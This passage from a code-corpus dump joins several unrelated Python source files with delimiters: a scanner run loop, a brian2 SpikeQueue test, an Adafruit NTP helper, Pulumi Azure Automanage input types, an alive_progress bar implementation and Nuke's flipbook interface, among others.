if util_git.monitor_check(): return
cnt = 1
t = next_time()
print(f"sleep until {t}")
while True:
time.sleep(15)
if datetime.now() < t: continue
if util_git.monitor_check(): break
print("==================================")
print(f"=== run {cnt} at {t}")
print("==================================")
try:
scanner.update_sources()
scanner.process()
if capture: special_cases(capture)
if auto_push: util_git.push(scanner.config.base_dir, f"{udatetime.to_displayformat(scanner.change_list.start_date)} on {host}")
except Exception as ex:
logger.exception(ex)
print(f"run failed, wait 5 minutes and try again")
t = t + timedelta(minutes=5)
print("==================================")
print("")
t = next_time()
print(f"sleep until {t}")
cnt += 1
finally:
if capture: capture.close()
def run_once(scanner: DataPipeline, auto_push: bool):
scanner.update_sources()
scanner.process()
if auto_push:
host = get_host()
util_git.push(scanner.config.base_dir, f"{udatetime.to_logformat(scanner.change_list.start_date)} on {host}")
def main(args_list=None):
if args_list is None:
args_list = sys.argv[1:]
args = parser.parse_args(args_list)
if args.auto_update:
return util_git.monitor_start("--auto_update")
if not args.auto_push:
logger.warning("github push is DISABLED")
config = DataPipelineConfig(args.base_dir, args.temp_dir, flags = {
"trace": args.trace,
"capture_image": args.capture_image,
"rerun_now": args.rerun_now,
"firefox": args.use_firefox,
"chrome": args.use_chrome,
"headless": not args.show_browser,
})
scanner = DataPipeline(config)
capture = init_specialized_capture(args)
if args.clean_html or args.extract_html or args.format_html:
if args.format_html: scanner.format_html(rerun=True)
if args.clean_html: scanner.clean_html(rerun=True)
if args.extract_html: scanner.extract_html(rerun=True)
elif args.continuous:
scanner.format_html()
scanner.clean_html()
scanner.extract_html()
run_continuous(scanner, capture, auto_push = args.auto_push)
else:
scanner.format_html()
scanner.clean_html()
scanner.extract_html()
run_once(scanner, args.auto_push)
if __name__ == "__main__":
main()
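# Hypothetical invocations (the script file name is an assumption; the flags
# match the argparse definitions above):
#   python run_scanner.py --continuous --auto_push --chrome
#   python run_scanner.py -c -x   # run only the html cleaner and extractor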
|
py | 1a4a26eafca4575c8aafa1ced0c487bd7e21b012 | import numpy as np
from numpy.testing.utils import assert_equal
from brian2.synapses.spikequeue import SpikeQueue
from brian2.units.stdunits import ms
from brian2.memory.dynamicarray import DynamicArray1D
def create_all_to_all(N):
'''
Return a tuple containing `synapses` and `delays` in the form that is needed
for the `SpikeQueue` initializer.
Every synapse has a delay depending on the presynaptic neuron.
'''
data = np.repeat(np.arange(N), N)
delays = DynamicArray1D(data.shape, dtype=np.int32)
delays[:] = data
synapses = [DynamicArray1D(N, dtype=np.int32) for _ in xrange(N)]
for i in xrange(N):
synapses[i][:] = np.arange(N) + i*N
return synapses, delays
def create_one_to_one(N):
'''
Return a tuple containing `synapses` and `delays` in the form that is needed
for the `SpikeQueue` initializer.
Every synapse has a delay depending on the presynaptic neuron.
'''
data = np.arange(N)
delays = DynamicArray1D(data.shape, dtype=np.int32)
delays[:] = data
data = np.arange(N)
synapses = [DynamicArray1D(1, dtype=np.int32) for _ in xrange(N)]
for i in xrange(N):
synapses[i][:] = i
return synapses, delays
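# Worked example of the helper outputs (illustrative): with N = 2,
# create_all_to_all returns delays [0, 0, 1, 1] with synapse targets
# [[0, 1], [2, 3]], while create_one_to_one returns delays [0, 1] with
# synapse targets [[0], [1]].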
def test_spikequeue():
N = 100
synapses, delays = create_one_to_one(N)
queue = SpikeQueue()
queue.compress(delays, synapses, N)
queue.push(np.arange(N, dtype=np.int32), delays)
for i in xrange(N):
assert_equal(queue.peek(), np.array([i]))
queue.next()
for i in xrange(N):
assert_equal(queue.peek(), np.array([]))
queue.next()
synapses, delays = create_all_to_all(N)
queue = SpikeQueue()
queue.compress(delays, synapses, N*N)
queue.push(np.arange(N*N, dtype=np.int32), delays)
for i in xrange(N):
assert_equal(queue.peek(), i*N + np.arange(N))
queue.next()
for i in xrange(N):
assert_equal(queue.peek(), np.array([]))
queue.next()
if __name__ == '__main__':
test_spikequeue()
|
py | 1a4a27ab5774b0aa1a67d9b121bb480f64c2ab4f | # The MIT License (MIT)
#
# Copyright (c) 2019 Brent Rubell for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_ntp`
================================================================================
Network Time Protocol (NTP) helper for CircuitPython
* Author(s): Brent Rubell
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
import rtc
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_NTP.git"
class NTP:
"""Network Time Protocol (NTP) helper module for CircuitPython.
This module does not handle daylight savings or local time.
:param adafruit_esp32spi esp: ESP32SPI object.
"""
def __init__(self, esp):
# Verify ESP32SPI module
if "ESP_SPIcontrol" in str(type(esp)):
self._esp = esp
else:
raise TypeError("Provided object is not an ESP_SPIcontrol object.")
self.valid_time = False
def set_time(self, tz_offset=0):
"""Fetches and sets the microcontroller's current time
        in seconds since Jan 1, 1970.
:param int tz_offset: Timezone offset from GMT
"""
try:
now = self._esp.get_time()
now = time.localtime(now[0] + (tz_offset * 3600)) # 3600 seconds in an hour
rtc.RTC().datetime = now
self.valid_time = True
except ValueError as error:
print(str(error))
return
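# Hedged usage sketch (the SPI pin wiring below is an assumption; only the
# NTP(esp) / set_time() calls come from this module):
#
#   from adafruit_esp32spi import adafruit_esp32spi
#   esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)
#   ntp = NTP(esp)
#   while not ntp.valid_time:
#       ntp.set_time(tz_offset=-5)   # e.g. UTC-5; retried until the ESP32 has time
#       time.sleep(5)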
|
py | 1a4a2861358001c2a9bd95afb720b8b5bd89a2d5 | from random import randint
import sys
RANDOM_NUMS = []
class Assign:
def assign(self, number, some_member, member_list):
for item in member_list:
if number == item.assignee:
continue
some_member.assignee = number
break
def assign_nums(self, member_list):
for member in member_list:
count = 0
random_num = randint(0, len(member_list) - 1)
while random_num in RANDOM_NUMS or random_num == member_list.index(member):
random_num = randint(0, len(member_list) - 1)
if count == 3:
print("Loop failed, try again!")
sys.exit()
count += 1
RANDOM_NUMS.append(random_num)
count -= count
            self.assign(random_num, member, member_list) |
py | 1a4a2886c82e4bf353017599bf6b9440d53dfaf7 | from plenum.common.messages.fields import ProtocolVersionField
from plenum.common.plenum_protocol_version import PlenumProtocolVersion
validator = ProtocolVersionField()
def test_valid():
assert not validator.validate(1)
assert not validator.validate(PlenumProtocolVersion.STATE_PROOF_SUPPORT.value)
assert not validator.validate(None) # version can be None (for backward compatibility)
def test_invalid():
assert validator.validate(2)
assert validator.validate("1")
assert validator.validate("")
assert validator.validate(0)
assert validator.validate(1.0)
assert validator.validate(0.1)
|
py | 1a4a2989dc8b607e64a614936ef74ea67d3bd5ac | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from ._enums import *
__all__ = [
'AccountIdentityArgs',
'ConfigurationProfileAssignmentPropertiesArgs',
'ConfigurationProfilePreferenceAntiMalwareArgs',
'ConfigurationProfilePreferencePropertiesArgs',
'ConfigurationProfilePreferenceVmBackupArgs',
]
@pulumi.input_type
class AccountIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
Identity for the Automanage account.
:param pulumi.Input['ResourceIdentityType'] type: The type of identity used for the Automanage account. Currently, the only supported type is 'SystemAssigned', which implicitly creates an identity.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The type of identity used for the Automanage account. Currently, the only supported type is 'SystemAssigned', which implicitly creates an identity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ConfigurationProfileAssignmentPropertiesArgs:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[str]] = None,
configuration_profile: Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]] = None,
configuration_profile_preference_id: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None):
"""
Automanage configuration profile assignment properties.
:param pulumi.Input[str] account_id: The Automanage account ARM Resource URI
:param pulumi.Input[Union[str, 'ConfigurationProfile']] configuration_profile: A value indicating configuration profile.
:param pulumi.Input[str] configuration_profile_preference_id: The configuration profile custom preferences ARM resource URI
:param pulumi.Input[str] target_id: The target VM resource URI
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if configuration_profile is not None:
pulumi.set(__self__, "configuration_profile", configuration_profile)
if configuration_profile_preference_id is not None:
pulumi.set(__self__, "configuration_profile_preference_id", configuration_profile_preference_id)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[str]]:
"""
The Automanage account ARM Resource URI
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="configurationProfile")
def configuration_profile(self) -> Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]]:
"""
A value indicating configuration profile.
"""
return pulumi.get(self, "configuration_profile")
@configuration_profile.setter
def configuration_profile(self, value: Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]]):
pulumi.set(self, "configuration_profile", value)
@property
@pulumi.getter(name="configurationProfilePreferenceId")
def configuration_profile_preference_id(self) -> Optional[pulumi.Input[str]]:
"""
The configuration profile custom preferences ARM resource URI
"""
return pulumi.get(self, "configuration_profile_preference_id")
@configuration_profile_preference_id.setter
def configuration_profile_preference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_profile_preference_id", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
The target VM resource URI
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@pulumi.input_type
class ConfigurationProfilePreferenceAntiMalwareArgs:
def __init__(__self__, *,
enable_real_time_protection: Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]] = None,
exclusions: Optional[Any] = None,
run_scheduled_scan: Optional[pulumi.Input[Union[str, 'RunScheduledScan']]] = None,
scan_day: Optional[pulumi.Input[str]] = None,
scan_time_in_minutes: Optional[pulumi.Input[str]] = None,
scan_type: Optional[pulumi.Input[Union[str, 'ScanType']]] = None):
"""
Automanage configuration profile Antimalware preferences.
:param pulumi.Input[Union[str, 'EnableRealTimeProtection']] enable_real_time_protection: Enables or disables Real Time Protection
:param Any exclusions: Extensions, Paths and Processes that must be excluded from scan
:param pulumi.Input[Union[str, 'RunScheduledScan']] run_scheduled_scan: Enables or disables a periodic scan for antimalware
:param pulumi.Input[str] scan_day: Schedule scan settings day
:param pulumi.Input[str] scan_time_in_minutes: Schedule scan settings time
:param pulumi.Input[Union[str, 'ScanType']] scan_type: Type of scheduled scan
"""
if enable_real_time_protection is not None:
pulumi.set(__self__, "enable_real_time_protection", enable_real_time_protection)
if exclusions is not None:
pulumi.set(__self__, "exclusions", exclusions)
if run_scheduled_scan is not None:
pulumi.set(__self__, "run_scheduled_scan", run_scheduled_scan)
if scan_day is not None:
pulumi.set(__self__, "scan_day", scan_day)
if scan_time_in_minutes is not None:
pulumi.set(__self__, "scan_time_in_minutes", scan_time_in_minutes)
if scan_type is not None:
pulumi.set(__self__, "scan_type", scan_type)
@property
@pulumi.getter(name="enableRealTimeProtection")
def enable_real_time_protection(self) -> Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]]:
"""
Enables or disables Real Time Protection
"""
return pulumi.get(self, "enable_real_time_protection")
@enable_real_time_protection.setter
def enable_real_time_protection(self, value: Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]]):
pulumi.set(self, "enable_real_time_protection", value)
@property
@pulumi.getter
def exclusions(self) -> Optional[Any]:
"""
Extensions, Paths and Processes that must be excluded from scan
"""
return pulumi.get(self, "exclusions")
@exclusions.setter
def exclusions(self, value: Optional[Any]):
pulumi.set(self, "exclusions", value)
@property
@pulumi.getter(name="runScheduledScan")
def run_scheduled_scan(self) -> Optional[pulumi.Input[Union[str, 'RunScheduledScan']]]:
"""
Enables or disables a periodic scan for antimalware
"""
return pulumi.get(self, "run_scheduled_scan")
@run_scheduled_scan.setter
def run_scheduled_scan(self, value: Optional[pulumi.Input[Union[str, 'RunScheduledScan']]]):
pulumi.set(self, "run_scheduled_scan", value)
@property
@pulumi.getter(name="scanDay")
def scan_day(self) -> Optional[pulumi.Input[str]]:
"""
Schedule scan settings day
"""
return pulumi.get(self, "scan_day")
@scan_day.setter
def scan_day(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scan_day", value)
@property
@pulumi.getter(name="scanTimeInMinutes")
def scan_time_in_minutes(self) -> Optional[pulumi.Input[str]]:
"""
Schedule scan settings time
"""
return pulumi.get(self, "scan_time_in_minutes")
@scan_time_in_minutes.setter
def scan_time_in_minutes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scan_time_in_minutes", value)
@property
@pulumi.getter(name="scanType")
def scan_type(self) -> Optional[pulumi.Input[Union[str, 'ScanType']]]:
"""
Type of scheduled scan
"""
return pulumi.get(self, "scan_type")
@scan_type.setter
def scan_type(self, value: Optional[pulumi.Input[Union[str, 'ScanType']]]):
pulumi.set(self, "scan_type", value)
@pulumi.input_type
class ConfigurationProfilePreferencePropertiesArgs:
def __init__(__self__, *,
anti_malware: Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']] = None,
vm_backup: Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']] = None):
"""
Automanage configuration profile preference properties.
:param pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs'] anti_malware: The custom preferences for Azure Antimalware.
:param pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs'] vm_backup: The custom preferences for Azure VM Backup.
"""
if anti_malware is not None:
pulumi.set(__self__, "anti_malware", anti_malware)
if vm_backup is not None:
pulumi.set(__self__, "vm_backup", vm_backup)
@property
@pulumi.getter(name="antiMalware")
def anti_malware(self) -> Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']]:
"""
The custom preferences for Azure Antimalware.
"""
return pulumi.get(self, "anti_malware")
@anti_malware.setter
def anti_malware(self, value: Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']]):
pulumi.set(self, "anti_malware", value)
@property
@pulumi.getter(name="vmBackup")
def vm_backup(self) -> Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']]:
"""
The custom preferences for Azure VM Backup.
"""
return pulumi.get(self, "vm_backup")
@vm_backup.setter
def vm_backup(self, value: Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']]):
pulumi.set(self, "vm_backup", value)
@pulumi.input_type
class ConfigurationProfilePreferenceVmBackupArgs:
def __init__(__self__, *,
instant_rp_retention_range_in_days: Optional[pulumi.Input[int]] = None,
retention_policy: Optional[pulumi.Input[str]] = None,
schedule_policy: Optional[pulumi.Input[str]] = None,
time_zone: Optional[pulumi.Input[str]] = None):
"""
Automanage configuration profile VM Backup preferences.
:param pulumi.Input[int] instant_rp_retention_range_in_days: Instant RP retention policy range in days
:param pulumi.Input[str] retention_policy: Retention policy with the details on backup copy retention ranges.
:param pulumi.Input[str] schedule_policy: Backup schedule specified as part of backup policy.
:param pulumi.Input[str] time_zone: TimeZone optional input as string. For example: Pacific Standard Time
"""
if instant_rp_retention_range_in_days is not None:
pulumi.set(__self__, "instant_rp_retention_range_in_days", instant_rp_retention_range_in_days)
if retention_policy is not None:
pulumi.set(__self__, "retention_policy", retention_policy)
if schedule_policy is not None:
pulumi.set(__self__, "schedule_policy", schedule_policy)
if time_zone is not None:
pulumi.set(__self__, "time_zone", time_zone)
@property
@pulumi.getter(name="instantRpRetentionRangeInDays")
def instant_rp_retention_range_in_days(self) -> Optional[pulumi.Input[int]]:
"""
Instant RP retention policy range in days
"""
return pulumi.get(self, "instant_rp_retention_range_in_days")
@instant_rp_retention_range_in_days.setter
def instant_rp_retention_range_in_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_rp_retention_range_in_days", value)
@property
@pulumi.getter(name="retentionPolicy")
def retention_policy(self) -> Optional[pulumi.Input[str]]:
"""
Retention policy with the details on backup copy retention ranges.
"""
return pulumi.get(self, "retention_policy")
@retention_policy.setter
def retention_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retention_policy", value)
@property
@pulumi.getter(name="schedulePolicy")
def schedule_policy(self) -> Optional[pulumi.Input[str]]:
"""
Backup schedule specified as part of backup policy.
"""
return pulumi.get(self, "schedule_policy")
@schedule_policy.setter
def schedule_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schedule_policy", value)
@property
@pulumi.getter(name="timeZone")
def time_zone(self) -> Optional[pulumi.Input[str]]:
"""
TimeZone optional input as string. For example: Pacific Standard Time
"""
return pulumi.get(self, "time_zone")
@time_zone.setter
def time_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_zone", value)
|
py | 1a4a2b151700b8376c71a0a00e4049e1df17343e | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..icc import ICC
def test_ICC_inputs():
input_map = dict(
mask=dict(mandatory=True, ),
subjects_sessions=dict(mandatory=True, ),
)
inputs = ICC.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_ICC_outputs():
output_map = dict(
icc_map=dict(),
session_var_map=dict(),
subject_var_map=dict(),
)
outputs = ICC.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
py | 1a4a2cd24bb0ee3a84161f2c11f08add30edc310 | # coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import sys
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import chain, islice, repeat
from .animations.utils import spinner_player
from .configuration import config_handler
@contextmanager
def alive_bar(total=None, title=None, calibrate=None, **options):
"""An alive progress bar to keep track of lengthy operations.
It has a spinner indicator, time elapsed, throughput and eta.
When the operation finishes, a receipt is displayed with statistics.
    If the code is being executed in a headless environment, i.e. without a
    connected tty, all features of the alive progress bar will be disabled
    except the final receipt.
    Another cool feature is that it tracks the actual count in regard to the
expected count. It will look different if you send more (or less) than
expected.
Also, the bar installs a hook in the system print function, which cleans
any garbage mix-up of texts, allowing you to print() while using the bar.
    And finally, it also does not show anything like `eta: 1584s`; it will nicely
show `eta: 0:26:24` as you would expect (but anything less than a minute
is indeed `eta: 42s`). :)
Use it like this:
>>> from alive_progress import alive_bar
... with alive_bar(<total>) as bar:
... for item in <iterable>:
... # process item
... bar() # makes the bar go forward
The `bar()` call is what makes the bar go forward. You can call it always,
or you can choose when to call it, depending on what you want to monitor.
While in a progress bar context, you have two ways to output messages:
- call `bar('text')`, which besides incrementing the counter, also
sets/overwrites an inline message within the bar;
- call `print('text')`, which prints an enriched message that includes
the current position of the progress bar, effectively leaving behind a
log and continuing the progress bar below it.
Both methods always clear the line appropriately to remove any garbage of
previous messages on screen.
If the bar is over or underused, it will warn you!
To test all supported scenarios, you can do this:
>>> for x in 1000, 1500, 700, 0:
... with alive_bar(x) as bar:
... for i in range(1000):
... time.sleep(.005)
... bar()
Expected results are these (but you have to see them in motion!):
[========================================] 3000/3000 [100%] in 7.4s (408.09/s)
[==============================! ] (!) 3000/4000 [75%] in 7.3s (408.90/s)
[========================================x (!) 3000/2000 [150%] in 7.4s (408.11/s)
[========================================] 3000 in 7.4s (407.54/s)
Args:
total (Optional[int]): the total expected count
title (Optional[str]): the title, will be printed whenever there's no custom message
calibrate (int): maximum theoretical throughput to calibrate animation speed
(cannot be in the global configuration because it depends on the current mode)
**options: custom configuration options, which override the global configuration:
length (int): number of characters to render the animated progress bar
spinner (Union[str | object]): spinner name in alive_progress.SPINNERS or custom
bar (Union[str | object]): bar name in alive_progress.BARS or custom
unknown (Union[str | object]): spinner name in alive_progress.SPINNERS or custom
theme (str): theme name in alive_progress.THEMES
force_tty (bool): runs animations even without a tty (pycharm terminal for example)
manual (bool): set to manually control percentage
"""
if total is not None:
if not isinstance(total, int):
raise TypeError("integer argument expected, got '{}'.".format(type(total).__name__))
if total <= 0:
total = None
config = config_handler(**options)
def to_elapsed():
return timedelta(seconds=int(run.elapsed)) if run.elapsed >= 60 else \
'{:.1f}s'.format(run.elapsed) if end else '{}s'.format(int(run.elapsed))
def clear_traces():
sys.__stdout__.write('\033[2K\r')
def run():
player = spinner_player(config.spinner())
while thread:
event.wait()
alive_repr(next(player))
time.sleep(1. / fps())
def alive_repr(spin=''):
update_data()
line = '{} {}{}{} in {} {} {}'.format(
bar_repr(run.percent, end), spin, spin and ' ' or '',
monitor(), to_elapsed(), run.stats(), run.text or title or ''
)
line_len = len(line)
with print_lock:
if line_len < run.last_line_len:
clear_traces()
sys.__stdout__.write(line + (spin and '\r' or '\n'))
sys.__stdout__.flush()
run.last_line_len = line_len
def flush_buffer():
if print_buffer:
print()
def sanitize_text(text):
return ' '.join(str(text).splitlines())
if config.manual:
def bar(perc=None, text=None):
if perc is not None:
flush_buffer()
run.percent = float(perc)
if text is not None:
run.text = sanitize_text(text)
return run.percent
else:
def bar(text=None, incr=1):
if incr > 0:
flush_buffer()
run.count += int(incr)
if text is not None:
run.text = sanitize_text(text)
return run.count
def print_hook(part):
if part != '\n':
# this will generate a sequence of lines interspersed with None, which will later
# be rendered as the indent filler to align additional lines under the same header.
gen = chain.from_iterable(zip(repeat(None), part.splitlines(True)))
print_buffer.extend(islice(gen, 1, None))
else:
header = header_template.format(run.count)
nested = ''.join(line or ' ' * len(header) for line in print_buffer)
with print_lock:
clear_traces()
sys.__stdout__.write('{}{}\n'.format(header, nested))
print_buffer[:] = []
print_buffer, print_lock = [], threading.Lock()
header_template = 'on {}: ' if config.enrich_print else ''
print_hook.write = print_hook
print_hook.flush = lambda: None
print_hook.isatty = sys.__stdout__.isatty
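# Illustrative effect of the hook above: while the bar is running and
# config.enrich_print is enabled, a plain print('checkpoint reached') is routed
# through print_hook and lands on its own line as 'on 42: checkpoint reached'
# (42 being the current count), with the progress bar then redrawn below it.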
def start_monitoring(offset=0.):
sys.stdout = print_hook
event.set()
run.init = time.time() - offset
def stop_monitoring(clear):
if clear:
event.clear()
sys.stdout = sys.__stdout__
return time.time() - run.init
thread, event = None, threading.Event()
if sys.stdout.isatty() or config.force_tty:
@contextmanager
def pause_monitoring():
offset = stop_monitoring(True)
alive_repr()
yield
start_monitoring(offset)
bar.pause = pause_monitoring
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
def update_data():
update_hook()
run.elapsed = time.time() - run.init
run.rate = current() / run.elapsed if run.elapsed else 0.
run.eta_text = eta_text()
if total or config.manual: # we can track progress and therefore eta.
def eta_text():
if run.rate:
eta = (logic_total - current()) / run.rate
if eta >= 0:
return '{:.0f}s'.format(eta) if eta < 60 \
else timedelta(seconds=math.ceil(eta))
return '?'
bar_repr = config.bar(config.length)
stats = lambda: '({:.1{}}/s, eta: {})'.format(run.rate, format_spec, run.eta_text) # noqa
else: # unknown progress.
eta_text = lambda: None # noqa
bar_repr = config.unknown(config.length, config.bar)
stats = lambda: '({:.1f}/s)'.format(run.rate) # noqa
stats_end = lambda: '({:.2{}}/s)'.format(run.rate, format_spec) # noqa
if total or not config.manual: # we can count items.
logic_total, format_spec, factor, current = total, 'f', 1.e6, lambda: run.count # noqa
else: # there's only a manual percentage.
logic_total, format_spec, factor, current = 1., '%', 1., lambda: run.percent # noqa
# calibration of the dynamic fps engine.
# I've started with the equation y = log10(x + m) * k + n, where:
# y is the desired fps, m and n are horizontal and vertical translation,
# k is a calibration factor, computed from some user input c (see readme for details).
# considering minfps and maxfps as given constants, I came to:
# fps = log10(x + 1) * k + minfps, which must be equal to maxfps for x = c,
# so the factor k = (maxfps - minfps) / log10(c + 1), and
# fps = log10(x + 1) * (maxfps - minfps) / log10(c + 1) + minfps
# neat! ;)
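# worked example (illustrative, with the defaults set below for counting mode,
# i.e. calibrate = 1e6, min_fps = 2, max_fps = 60): k = 58 / log10(1e6 + 1) ~= 9.67,
# so a measured rate of ~1000 items/s refreshes at about log10(1001) * 9.67 + 2 ~= 31 fps,
# while rates at or above the calibration point are clamped to the 60 fps ceiling.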
min_fps, max_fps = 2., 60.
calibrate = max(0., calibrate or factor)
adjust_log_curve = 100. / min(calibrate, 100.) # adjust curve for small numbers
factor = (max_fps - min_fps) / math.log10((calibrate * adjust_log_curve) + 1.)
def fps():
if run.rate <= 0:
return 10. # bootstrap speed
if run.rate < calibrate:
return math.log10((run.rate * adjust_log_curve) + 1.) * factor + min_fps
return max_fps
end, run.text, run.eta_text, run.stats = False, '', '', stats
run.count, run.last_line_len = 0, 0
run.percent, run.rate, run.init, run.elapsed = 0., 0., 0., 0.
if total:
if config.manual:
def update_hook():
run.count = int(math.ceil(run.percent * total))
else:
def update_hook():
run.percent = run.count / total
monitor = lambda: '{}{}/{} [{:.0%}]'.format( # noqa
'(!) ' if end and run.count != total else '', run.count, total, run.percent
)
elif config.manual:
update_hook = lambda: None # noqa
monitor = lambda: '{}{:.0%}'.format( # noqa
'(!) ' if end and run.percent != 1. else '', run.percent
)
else:
run.percent = 1.
update_hook = lambda: None # noqa
monitor = lambda: '{}'.format(run.count) # noqa
start_monitoring()
try:
yield bar
finally:
flush_buffer()
stop_monitoring(False)
if thread:
local_copy = thread
thread = None # lets the internal thread terminate gracefully.
local_copy.join()
end, run.text, run.stats = True, '', stats_end
alive_repr()
|
py | 1a4a2defad0b6ddb9d2b4adf5528d2fa9c059a84 | # Copyright (c) 2010 The Foundry Visionmongers Ltd. All Rights Reserved.
###############################################################################
import nuke
class FlipbookApplication(object):
"""An interface, for so far as Python supports it. To add support for a
flipbook this needs to be subclassed and the 3 methods implemented. The
default implementation just raises an exception so any sub implementer
will soon find out whether his implementation works."""
def __init__(self):
return
def name(self):
""" Return the name of the flipbook.
@return: String"""
raise NotImplementedError
def path(self):
"""Return the executable path required to run a flipbook.
@return: String"""
raise NotImplementedError
def cacheDir(self):
"""Return the preferred directory for rendering.
@return: String"""
raise NotImplementedError
def runFromNode(self, nodeToFlipbook, frameRanges, views, options):
"""Execute the flipbook on a node.
This method will use the node's filename to call run()
@param nodeToFlipbook: The node to run the flipbook on
@param frameRanges: A FrameRanges object representing the range that should be flipbooked. Note that in 6.2v1-2 this was a FrameRange object.
@param views: A list of strings comprising the views to flipbook. Will not be more than the maximum supported by the flipbook.
@param options: A dictionary of options to use. This may contain the keys pixelAspect, roi, dimensions, audio and lut. These contain a float, a dict with bounding box dimensions, a dict with width and height, a path to an audio file and a string indicating the LUT conversion to apply.
@return: None"""
filename = nuke.filename(nodeToFlipbook)
if filename is None or filename == "":
raise RuntimeError("Cannot run a flipbook on '%s', expected to find a filename and there was none." % (nodeToFlipbook.fullName(),))
self.run( filename, frameRanges, views, options)
def run(self, path, frameRanges, views, options):
"""Execute the flipbook on a path.
@param path: The path to run the flipbook on. This will be similar to /path/to/foo%03d.exr
@param frameRanges: A FrameRanges object representing the range that should be flipbooked. Note that in 6.2v1-2 this was a FrameRange object.
@param views: A list of strings comprising the views to flipbook. Will not be more than the maximum supported by the flipbook.
@param options: A dictionary of options to use. This may contain the keys pixelAspect, roi, dimensions, audio and lut. These contain a float, a dict with bounding box dimensions, a dict with width and height, a path to an audio file and a string indicating the LUT conversion to apply.
@return: None"""
raise NotImplementedError
def capabilities(self):
"""Return the capabilities of the flipbook application in a dict. Currently used are:
canPreLaunch: bool, whether the flipbook can display frames that are still being rendered by Nuke.
maximumViews: int, the number of views supported by this flipbook, should be 1 or higher.
fileTypes: list, the extensions of the file types supported by this format. Must all be lowercase, e.g. ["exr", "jpg", ...].
A wildcard ["*"] can also be used to indicate support for any file type Nuke supports.
roi: bool, whether the flipbook supports region-of-interest.
@return: dict with the capabilities above."""
raise NotImplementedError
def dialogKnobs(self, dialog):
"""This is called when the user has selected this flipbook application, and will be interested in any knobs that you might have to show for custom settings.
@param dialog: The FlipbookDialog that has requested the knobs to be added to it, e.g. dialog.addKnob(...)
@return: None"""
raise NotImplementedError
def dialogKnobChanged(self, dialog, knob):
"""Called whenever this flipbook is selected and one of the knobs added in dialogKnobs was changed.
@param dialog: The FlipbookDialog that contains the knob
@param knob: The knob added in dialogKnobs that was modified.
@return: None"""
raise NotImplementedError
def getExtraOptions(self, flipbookDialog, nodeToFlipbook):
